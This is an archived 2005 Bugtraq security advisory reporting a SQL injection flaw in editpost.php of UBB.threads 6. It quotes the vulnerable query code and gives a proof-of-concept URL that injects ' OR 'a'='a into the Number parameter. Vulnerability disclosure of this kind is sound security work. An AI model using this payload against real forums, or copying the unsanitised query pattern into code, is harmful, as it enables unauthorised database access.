UBB.threads 6 SQL Injection

kre0n_at_mail.ru
Date: 03/11/05

  • Next message: Dragos Ruiu: "Security Masters Dojo"
    Date: 11 Mar 2005 16:58:58 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    ADZ Security Team
    ===================
    Info

    Program: UBB.threads
    Version: 6
    Module: editpost.php
    Bug type: SQL Injection
    Vendor site: http://www.ubbcentral.com/ubbthreads/
    ===================
    Bug discription

    at editpost.php we can see this code:
    // START
    $Cat = get_input("Cat","get");
    $Board = get_input("Board","get");
    $Number = get_input("Number","get");
    $page = get_input("page","get");
    $what = get_input("what","get");
    $vc = get_input("vc","get");
    // ...........
    $query = "
            SELECT
    B_Posterid,B_Subject,B_Body,B_Approved,B_Kept,B_Status,B_Main,B_Sticky,
    B_Posted,B_Icon,B_Poll,B_Convert,B_Topic,B_CalDay,B_CalMonth,B_CalYear,
    B_AddSig,B_Board FROM {$config['tbprefix']}Posts
            WHERE B_Number = '$Number'
    ";
    //..........
    // END
    As we see, $Number not checked as int value, so... :)
    ===================
    Example/PoC:

    http://[host]/[path]/editpost.php?Cat=X&Board=X&Number=1'%20OR%20'a'='a
    ===================
    Contact

    ADZ Security Team // http://adz.void.ru/
    kreon // kre0n@mail.ru, adz.kreon@gmail.com
    ===================


  • Next message: Dragos Ruiu: "Security Masters Dojo"